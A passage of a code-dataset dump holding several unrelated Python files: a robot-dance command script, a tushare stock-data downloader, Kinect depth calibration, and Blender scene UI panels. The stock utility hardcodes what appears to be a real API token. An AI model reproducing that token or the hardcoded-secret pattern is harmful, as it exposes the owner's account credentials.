\"03\"):\n # 腕を下げる\n # 両腕を500msの間、75degreeで回転\n mode = 99\n command_input = \"03,\"\n elif (sys.argv[1] == \"05\"):\n # こんにちは!\n mode = 99\n command_input = \"05,\"\n elif (sys.argv[1] == \"06\"):\n # はい!\n mode = 99\n command_input = \"06,\"\n elif (sys.argv[1] == \"07\"):\n # やだ!\n mode = 99\n command_input = \"07,\"\n elif (sys.argv[1] == \"08\"):\n # くま!\n mode = 99\n command_input = \"08,\"\n elif (sys.argv[1] == \"10\"):\n # ダンス開始\n mode = 99\n command_input = \"10,\"\n else:\n # 文字列入力\n mode = 1\n command_input = sys.argv[1]\n\n elif (len(sys.argv) == 5):\n if (sys.argv[1] == \"04\"):\n # サーボモータ修正用\n # Input: 04, サーボモータ番号, コマンド, 回転時間\n # コマンドは0が腕を下げる方向、1が上げる方向\n # サーボモータ番号は\n # RIGHT_HAND_UPDOWN 0\n # LEFT_HAND_UPDOWN 1\n # RIGHT_LEG 2\n # LEFT_LEG 3\n # ALL_SERVO 4\n mode = 99\n command_input = \"04,\" + str(sys.argv[2]) + \",\" + str(sys.argv[3]) + \",\" + str(sys.argv[4])\n else:\n # コマンド直接入力\n # 右腕、左腕、右足、左足の順に0 or 1\n mode = 2\n command_input = str(sys.argv[1]) + \",\" + str(sys.argv[2]) + \",\" + str(sys.argv[3]) + \",\" + str(sys.argv[4])\n else:\n # 引数なし->音声認識\n mode = 0\n command_input = None\n\n main(mode, command_input)\n", "sub_path": "dance1_py/dance1_1.py", "file_name": "dance1_1.py", "file_ext": "py", "file_size_in_byte": 20304, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "serial.Serial", "line_number": 23, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 56, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 450, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 451, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 455, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 460, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 464, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 468, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 472, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 476, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 483, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 485, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 486, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 497, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 502, "usage_type": "attribute"}]}
+{"seq_id": "570336822", "text": "# _*_coding:utf-8_*_\nimport tushare as ts\nimport pandas as pd\nimport os\nimport time\n\npro = ts.pro_api('769b6990fd248e065e95887933ea517ae21e8dacdbd24bc0d1cf673a')\n\n\n# ----------------------获取当前时间------------------- #\ndef getCurrentTime():\n return time.strftime('[%Y-%m-%d]', time.localtime(time.time()))\n\n\n# ----------------------下载某只股票数据------------------- #\n# code:股票编码 日期格式:2020-03-11 filename:文件夹路径../data/\n# length是筛选股票长度,默认值为-1,即不做筛选,可人为指定长度,如300,既少于300天的股票不保存\ndef get_stock_data(code, date1, date2, filename, length=-1):\n df = ts.get_hist_data(code, start=date1, end=date2)\n df1 = pd.DataFrame(df)\n df1 = df1[['open', 'high', 'close', 'low', 'volume', 'p_change']]\n df1 = df1.sort_values(by='date')\n print('共有%s天数据' % len(df1))\n if not os.path.exists(filename):\n os.makedirs(filename)\n if length == -1:\n path = code + '.csv'\n df1.to_csv(os.path.join(filename, path))\n else:\n if len(df1) >= length:\n path = code + '.csv'\n df1.to_csv(os.path.join(filename, path))\n\n\n# ----------------------下载沪深300指数数据------------------- #\n# date1是开始日期,date2是截止日期,filename是文件存放目录\ndef get_hs300_data(date1, date2, filename):\n df = ts.get_hist_data('399300', start=date1, end=date2)\n df1 = pd.DataFrame(df)\n df1 = df1[['open', 'high', 'close', 'low', 'volume', 'p_change']]\n df1 = df1.sort_values(by='date')\n print('共有%s天数据' % len(df1))\n df1.to_csv(os.path.join(filename, '399300.csv'))\n\n\n# ------------------------更新股票数据------------------------ #\n# 将股票数据从本地文件的最后日期更新至当日\n# code:股票代码\ndef update_stock_data(code):\n filename = '../data/stock_basic/' + code + '.csv'\n (filepath, tempfilename) = os.path.split(filename)\n (stock_code, extension) = os.path.splitext(tempfilename)\n f = open(filename, 'r')\n df = pd.read_csv(f)\n print('股票{}文件中的最新日期为:{}'.format(stock_code, df.iloc[-1, 0]))\n data_now = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n print('更新日期至:%s' % data_now)\n nf = ts.get_hist_data(stock_code, str(df.iloc[-1, 0]), data_now)\n nf = nf.sort_values(by='date')\n nf = nf.iloc[1:]\n print('共有%s天数据' % len(nf))\n nf = pd.DataFrame(nf)\n nf = nf[['open', 'high', 'close', 'low', 'volume', 'p_change']]\n nf.to_csv(filename, mode='a', header=False)\n f.close()\n\n\n# ----------------------下载沪深300股票信息------------------- #\ndef get_hs300_code_name(filename):\n df = ts.get_hs300s()\n df1 = pd.DataFrame(df)\n df1 = df1[['name', 'code']]\n df1.to_csv(os.path.join(filename, 'hs300.csv'))\n\n\n# ------------------------批量下载沪深300股票数据------------------------ #\ndef download_hs300_stock_data(date1, date2, filename):\n df = pd.read_csv('../data/hs300/hs300.csv')['code']\n for code in df:\n code = \"{0:06d}\".format(code)\n if not os.path.exists('../data/hs300/{}.csv'.format(code)):\n get_stock_data(code, date1, date2, filename)\n\n\n# ------------------------使用pandas去除重复数据------------------------ #\ndef quchong(file):\n f = open(file)\n df = pd.read_csv(f, header=0)\n datalist = df.drop_duplicates()\n datalist.to_csv(file)\n\n\n# ------------------------获取股票长度----------------------- #\n# 辅助函数\ndef get_data_len(file_path):\n df = pd.read_csv(file_path)\n return len(df)\n\n\n# ------------------------获取交易所交易日历数据----------------------- #\ndef trade_cal_sse(start_date):\n # exchange:交易所 SSE上交所 SZSE深交所\n df = pro.trade_cal(exchange='SZSE', start_date='20180101', end_date='20200405')\n df.to_csv('../data/trade_cal/trade_cal_szse.csv')\n\n\n# ------------------------获取当前所有正常上市交易的股票列表----------------------- #\ndef get_stock_basic():\n # 查询当前所有正常上市交易的股票列表\n df = pro.stock_basic(exchange='', list_status='L', fields='ts_code,symbol,name,area,industry,fullname,market,'\n 'list_date')\n # 去除ST股\n df = df[~df.name.str.contains('ST')]\n df.to_csv('../data/stock_basic/stock_basic.csv')\n\n\n# -----------------------------批量下载所有股票数据-----------------------------------#\ndef download_all_stock():\n pool = pd.read_csv('../data/stock_basic/stock_basic.csv')\n print('获得上市股票总数:', len(pool) - 1)\n j = 1\n for code in pool.ts_code[3074:]:\n print('正在获取第%d家,股票代码%s.' % (j, code))\n j += 1\n path = '../data/stock_basic/' + code + '.csv'\n # if not os.path.exists('../data/stock_basic/'+code+'.csv'):\n df = pro.daily(ts_code=code, start_date='20180101')\n df = df.sort_values(by='trade_date', ascending=True)\n df.to_csv(path, index=0)\n", "sub_path": "util/data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 5069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tushare.pro_api", "line_number": 7, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 12, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 12, "usage_type": "call"}, {"api_name": "time.time", "line_number": 12, "usage_type": "call"}, {"api_name": "tushare.get_hist_data", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tushare.get_hist_data", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 56, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 56, "usage_type": "call"}, {"api_name": "tushare.get_hist_data", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "tushare.get_hs300s", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "274239883", "text": "import numpy as np\nimport config\n\nlut = np.arange(5000).astype('f')\nlut[1:] = 1000./lut[1:]\nlut[0] = -1e8\n\n\ndef recip_depth_openni(depth):\n import scipy.weave\n assert depth.dtype == np.uint16\n output = np.empty(depth.shape,'f')\n N = np.prod(depth.shape)\n code = \"\"\"\n int i;\n for (i = 0; i < (int)N; i++) {\n output[i] = lut[depth[i]];\n }\n \"\"\"\n scipy.weave.inline(code, ['output','depth','lut','N'])\n return output\n\n\ndef projection():\n if config.ALIGNED:\n return aligned_projection()\n else:\n return unaligned_projection()\n\n\ndef aligned_projection():\n \"\"\"\n Camera matrix for the aligned\n \"\"\"\n fx = 528.0\n fy = 528.0\n cx = 320.0\n cy = 267.0\n\n mat = np.array([[fx, 0, -cx, 0],\n [0, -fy, -cy, 0],\n [0, 0, 0, 1],\n [0, 0, -1., 0]]).astype('f')\n return np.ascontiguousarray(mat)\n\n\ndef unaligned_projection():\n \"\"\"\n Camera matrix for the aligned\n \"\"\"\n fx = 575.8\n fy = 575.8\n cx = 320.0\n cy = 240.0\n\n mat = np.array([[fx, 0, -cx, 0],\n [0, -fy, -cy, 0],\n [0, 0, 0, 1],\n [0, 0, -1., 0]]).astype('f')\n return np.ascontiguousarray(mat)\n\n\nfull_vu = np.mgrid[:480,:640].astype('f')\n\n\ndef convertOpenNI2Real_weave(depth, u=None, v=None,\n mat=np.ascontiguousarray(\n np.linalg.inv(projection()))):\n assert mat.dtype == np.float32\n assert mat.dtype == np.float32\n assert mat.shape == (4,4)\n assert mat.flags['C_CONTIGUOUS']\n assert depth.dtype == np.uint16\n\n if u is None or v is None: v,u = full_vu\n assert depth.shape == u.shape == v.shape\n\n X,Y = u,v\n x,y,z = [np.empty(depth.shape, 'f') for i in range(3)]\n\n N = np.prod(depth.shape)\n code = \"\"\"\n int i;\n for (i = 0; i < (int)N; i++) {\n float Z = lut[depth[i]];\n float x_ = X[i]*mat[0] + Y[i]*mat[1] + Z*mat[2] + mat[3];\n float y_ = X[i]*mat[4] + Y[i]*mat[5] + Z*mat[6] + mat[7];\n float z_ = X[i]*mat[8] + Y[i]*mat[9] + Z*mat[10] + mat[11];\n float w = X[i]*mat[12] + Y[i]*mat[13] + Z*mat[14] + mat[15];\n w = 1/w;\n x[i] = x_*w;\n y[i] = y_*w;\n z[i] = z_*w;\n }\n \"\"\"\n import scipy.weave\n scipy.weave.inline(code, ['X','Y','depth','x','y','z','N','mat','lut'])\n return x,y,z\n\n\ndef convertOpenNI2Real_numpy(depth, u=None, v=None,\n mat=np.linalg.inv(projection())):\n\n if u is None or v is None: v,u = full_vu\n\n X,Y,Z = u,v, recip_depth_openni(depth)\n x,y,z = [np.empty(depth.shape, 'f') for i in range(3)]\n\n x = X*mat[0,0] + Y*mat[0,1] + Z*mat[0,2] + mat[0,3]\n y = X*mat[1,0] + Y*mat[1,1] + Z*mat[1,2] + mat[1,3]\n z = X*mat[2,0] + Y*mat[2,1] + Z*mat[2,2] + mat[2,3]\n w = X*mat[3,0] + Y*mat[3,1] + Z*mat[3,2] + mat[3,3]\n w = 1/w\n return x*w, y*w, z*w\n\n\ndef convertReal2OpenNI(X, Y, Z, mat=projection()):\n\n x = X*mat[0,0] + Y*mat[0,1] + Z*mat[0,2] + mat[0,3]\n y = X*mat[1,0] + Y*mat[1,1] + Z*mat[1,2] + mat[1,3]\n z = X*mat[2,0] + Y*mat[2,1] + Z*mat[2,2] + mat[2,3]\n w = X*mat[3,0] + Y*mat[3,1] + Z*mat[3,2] + mat[3,3]\n _z = 1000.*w/z\n w = 1/w\n return x*w, y*w, _z\n\n\nfrom calibkinect_cy import convertOpenNI2Real\n", "sub_path": "blockplayer/calibkinect.py", "file_name": "calibkinect.py", "file_ext": "py", "file_size_in_byte": 3284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.arange", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 13, "usage_type": "call"}, {"api_name": "scipy.weave.weave.inline", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.weave.weave", "line_number": 20, "usage_type": "attribute"}, {"api_name": "scipy.weave", "line_number": 20, "usage_type": "name"}, {"api_name": "config.ALIGNED", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.mgrid", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.ascontiguousarray", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 81, "usage_type": "call"}, {"api_name": "scipy.weave.weave.inline", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.weave.weave", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scipy.weave", "line_number": 97, "usage_type": "name"}, {"api_name": "numpy.linalg.inv", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 107, "usage_type": "call"}]}
+{"seq_id": "466102011", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom bpy.types import (\n Panel,\n UIList,\n)\n\nfrom rna_prop_ui import PropertyPanel\nfrom bl_operators.presets import PresetMenu\n\nfrom .properties_physics_common import (\n point_cache_ui,\n effector_weights_ui,\n)\n\n\nclass SCENE_UL_keying_set_paths(UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n # assert(isinstance(item, bpy.types.KeyingSetPath)\n kspath = item\n icon = layout.enum_item_icon(kspath, \"id_type\", kspath.id_type)\n if self.layout_type in {'DEFAULT', 'COMPACT'}:\n # Do not make this one editable in uiList for now...\n layout.label(text=kspath.data_path, translate=False, icon_value=icon)\n elif self.layout_type == 'GRID':\n layout.alignment = 'CENTER'\n layout.label(text=\"\", icon_value=icon)\n\n\nclass SceneButtonsPanel:\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"scene\"\n\n @classmethod\n def poll(cls, context):\n return (context.engine in cls.COMPAT_ENGINES)\n\n\nclass SCENE_PT_scene(SceneButtonsPanel, Panel):\n bl_label = \"Scene\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False\n\n scene = context.scene\n\n layout.prop(scene, \"camera\")\n layout.prop(scene, \"background_set\")\n layout.prop(scene, \"active_clip\")\n\n\nclass SCENE_PT_unit(SceneButtonsPanel, Panel):\n bl_label = \"Units\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n\n unit = context.scene.unit_settings\n\n layout.use_property_split = True\n layout.use_property_decorate = False\n\n layout.prop(unit, \"system\")\n\n col = layout.column()\n col.enabled = unit.system != 'NONE'\n col.prop(unit, \"scale_length\")\n col.prop(unit, \"use_separate\")\n\n col = layout.column()\n col.prop(unit, \"system_rotation\", text=\"Rotation\")\n subcol = col.column()\n subcol.enabled = unit.system != 'NONE'\n subcol.prop(unit, \"length_unit\", text=\"Length\")\n subcol.prop(unit, \"mass_unit\", text=\"Mass\")\n subcol.prop(unit, \"time_unit\", text=\"Time\")\n\n\nclass SceneKeyingSetsPanel:\n\n @staticmethod\n def draw_keyframing_settings(context, layout, ks, ksp):\n SceneKeyingSetsPanel._draw_keyframing_setting(\n context, layout, ks, ksp, \"Needed\",\n \"use_insertkey_override_needed\", \"use_insertkey_needed\",\n userpref_fallback=\"use_keyframe_insert_needed\",\n )\n SceneKeyingSetsPanel._draw_keyframing_setting(\n context, layout, ks, ksp, \"Visual\",\n \"use_insertkey_override_visual\", \"use_insertkey_visual\",\n userpref_fallback=\"use_visual_keying\",\n )\n SceneKeyingSetsPanel._draw_keyframing_setting(\n context, layout, ks, ksp, \"XYZ to RGB\",\n \"use_insertkey_override_xyz_to_rgb\", \"use_insertkey_xyz_to_rgb\",\n )\n\n @staticmethod\n def _draw_keyframing_setting(context, layout, ks, ksp, label, toggle_prop, prop, userpref_fallback=None):\n if ksp:\n item = ksp\n\n if getattr(ks, toggle_prop):\n owner = ks\n propname = prop\n else:\n owner = context.preferences.edit\n if userpref_fallback:\n propname = userpref_fallback\n else:\n propname = prop\n else:\n item = ks\n\n owner = context.preferences.edit\n if userpref_fallback:\n propname = userpref_fallback\n else:\n propname = prop\n\n row = layout.row(align=True)\n\n subrow = row.row(align=True)\n subrow.active = getattr(item, toggle_prop)\n\n if subrow.active:\n subrow.prop(item, prop, text=label)\n else:\n subrow.prop(owner, propname, text=label)\n\n row.prop(item, toggle_prop, text=\"\", icon='STYLUS_PRESSURE', toggle=True) # XXX: needs dedicated icon\n\n\nclass SCENE_PT_keying_sets(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):\n bl_label = \"Keying Sets\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n\n scene = context.scene\n\n row = layout.row()\n\n col = row.column()\n col.template_list(\"UI_UL_list\", \"keying_sets\", scene, \"keying_sets\", scene.keying_sets, \"active_index\", rows=1)\n\n col = row.column(align=True)\n col.operator(\"anim.keying_set_add\", icon='ADD', text=\"\")\n col.operator(\"anim.keying_set_remove\", icon='REMOVE', text=\"\")\n\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=False)\n\n ks = scene.keying_sets.active\n if ks and ks.is_path_absolute:\n col = flow.column()\n col.prop(ks, \"bl_description\")\n\n subcol = flow.column()\n subcol.operator_context = 'INVOKE_DEFAULT'\n subcol.operator(\"anim.keying_set_export\", text=\"Export to File\").filepath = \"keyingset.py\"\n\n\nclass SCENE_PT_keyframing_settings(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):\n bl_label = \"Keyframing Settings\"\n bl_parent_id = \"SCENE_PT_keying_sets\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}\n\n @classmethod\n def poll(cls, context):\n ks = context.scene.keying_sets.active\n return (ks and ks.is_path_absolute)\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n scene = context.scene\n ks = scene.keying_sets.active\n\n flow = layout.grid_flow(row_major=True, columns=0, even_columns=False, even_rows=False, align=True)\n\n col = flow.column(align=True)\n col.alignment = 'RIGHT'\n col.label(text=\"General Override\")\n\n self.draw_keyframing_settings(context, col, ks, None)\n\n ksp = ks.paths.active\n if ksp:\n col.separator()\n\n col = flow.column(align=True)\n col.alignment = 'RIGHT'\n col.label(text=\"Active Set Override\")\n\n self.draw_keyframing_settings(context, col, ks, ksp)\n\n\nclass SCENE_PT_keying_set_paths(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):\n bl_label = \"Active Keying Set\"\n bl_parent_id = \"SCENE_PT_keying_sets\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n ks = context.scene.keying_sets.active\n return (ks and ks.is_path_absolute)\n\n def draw(self, context):\n layout = self.layout\n\n scene = context.scene\n ks = scene.keying_sets.active\n\n row = layout.row()\n row.label(text=\"Paths:\")\n\n row = layout.row()\n\n col = row.column()\n col.template_list(\"SCENE_UL_keying_set_paths\", \"\", ks, \"paths\", ks.paths, \"active_index\", rows=1)\n\n col = row.column(align=True)\n col.operator(\"anim.keying_set_path_add\", icon='ADD', text=\"\")\n col.operator(\"anim.keying_set_path_remove\", icon='REMOVE', text=\"\")\n\n # TODO: 1) the template_any_ID needs to be fixed for the text alignment.\n # 2) use_property_decorate has to properly skip the non animatable properties.\n # Properties affected with needless draw:\n # group_method, template_any_ID dropdown, use_entire_array\n\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation (remove this later on).\n\n flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=True)\n\n ksp = ks.paths.active\n if ksp:\n col = flow.column(align=True)\n col.alignment = 'RIGHT'\n\n col.template_any_ID(ksp, \"id\", \"id_type\", text=\"Target ID-Block\")\n\n col.separator()\n\n col.template_path_builder(ksp, \"data_path\", ksp.id, text=\"Data Path\")\n\n col = flow.column()\n\n col.prop(ksp, \"use_entire_array\", text=\"Array All Items\")\n\n if not ksp.use_entire_array:\n col.prop(ksp, \"array_index\", text=\"Index\")\n\n col.separator()\n\n col.prop(ksp, \"group_method\", text=\"F-Curve Grouping\")\n if ksp.group_method == 'NAMED':\n col.prop(ksp, \"group\")\n\n\nclass SCENE_PT_audio(SceneButtonsPanel, Panel):\n bl_label = \"Audio\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n rd = context.scene.render\n ffmpeg = rd.ffmpeg\n\n flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)\n\n col = flow.column()\n col.prop(scene, \"audio_volume\")\n\n col.separator()\n\n col.prop(scene, \"audio_distance_model\")\n col.prop(ffmpeg, \"audio_channels\")\n\n col.separator()\n\n col = flow.column()\n col.prop(ffmpeg, \"audio_mixrate\", text=\"Sample Rate\")\n\n col.separator()\n\n col = col.column(align=True)\n col.prop(scene, \"audio_doppler_speed\", text=\"Doppler Speed\")\n col.prop(scene, \"audio_doppler_factor\", text=\"Doppler Factor\")\n\n col.separator()\n\n layout.operator(\"sound.bake_animation\")\n\n\nclass SCENE_PT_physics(SceneButtonsPanel, Panel):\n bl_label = \"Gravity\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw_header(self, context):\n self.layout.prop(context.scene, \"use_gravity\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n\n layout.active = scene.use_gravity\n\n layout.prop(scene, \"gravity\")\n\n\nclass SCENE_PT_rigid_body_world(SceneButtonsPanel, Panel):\n bl_label = \"Rigid Body World\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n return (context.engine in cls.COMPAT_ENGINES)\n\n def draw_header(self, context):\n scene = context.scene\n rbw = scene.rigidbody_world\n if rbw is not None:\n self.layout.prop(rbw, \"enabled\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n rbw = scene.rigidbody_world\n\n if rbw is None:\n layout.operator(\"rigidbody.world_add\")\n else:\n layout.operator(\"rigidbody.world_remove\")\n\n\nclass SCENE_PT_rigid_body_world_settings(SceneButtonsPanel, Panel):\n bl_label = \"Settings\"\n bl_parent_id = \"SCENE_PT_rigid_body_world\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}\n\n @classmethod\n def poll(cls, context):\n scene = context.scene\n return scene and scene.rigidbody_world and (context.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n rbw = scene.rigidbody_world\n\n if rbw:\n flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)\n\n col = flow.column()\n col.active = rbw.enabled\n\n col = col.column()\n col.prop(rbw, \"collection\")\n col.prop(rbw, \"constraints\")\n\n col = col.column()\n col.prop(rbw, \"time_scale\", text=\"Speed\")\n\n col = flow.column()\n col.active = rbw.enabled\n col.prop(rbw, \"use_split_impulse\")\n\n col = col.column()\n col.prop(rbw, \"steps_per_second\", text=\"Steps Per Second\")\n col.prop(rbw, \"solver_iterations\", text=\"Solver Iterations\")\n\n\nclass SCENE_PT_rigid_body_cache(SceneButtonsPanel, Panel):\n bl_label = \"Cache\"\n bl_parent_id = \"SCENE_PT_rigid_body_world\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n scene = context.scene\n return scene and scene.rigidbody_world and (context.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n scene = context.scene\n rbw = scene.rigidbody_world\n\n point_cache_ui(self, context, rbw.point_cache, rbw.point_cache.is_baked is False and rbw.enabled, 'RIGID_BODY')\n\n\nclass SCENE_PT_rigid_body_field_weights(SceneButtonsPanel, Panel):\n bl_label = \"Field Weights\"\n bl_parent_id = \"SCENE_PT_rigid_body_world\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n scene = context.scene\n return scene and scene.rigidbody_world and (context.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n scene = context.scene\n rbw = scene.rigidbody_world\n\n effector_weights_ui(self, context, rbw.effector_weights, 'RIGID_BODY')\n\n\nclass SCENE_PT_custom_props(SceneButtonsPanel, PropertyPanel, Panel):\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n _context_path = \"scene\"\n _property_type = bpy.types.Scene\n\n\nclasses = (\n SCENE_UL_keying_set_paths,\n SCENE_PT_scene,\n SCENE_PT_unit,\n SCENE_PT_physics,\n SCENE_PT_keying_sets,\n SCENE_PT_keying_set_paths,\n SCENE_PT_keyframing_settings,\n SCENE_PT_audio,\n SCENE_PT_rigid_body_world,\n SCENE_PT_rigid_body_world_settings,\n SCENE_PT_rigid_body_cache,\n SCENE_PT_rigid_body_field_weights,\n SCENE_PT_custom_props,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n", "sub_path": "engine/2.80/scripts/startup/bl_ui/properties_scene.py", "file_name": "properties_scene.py", "file_ext": "py", "file_size_in_byte": 15186, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 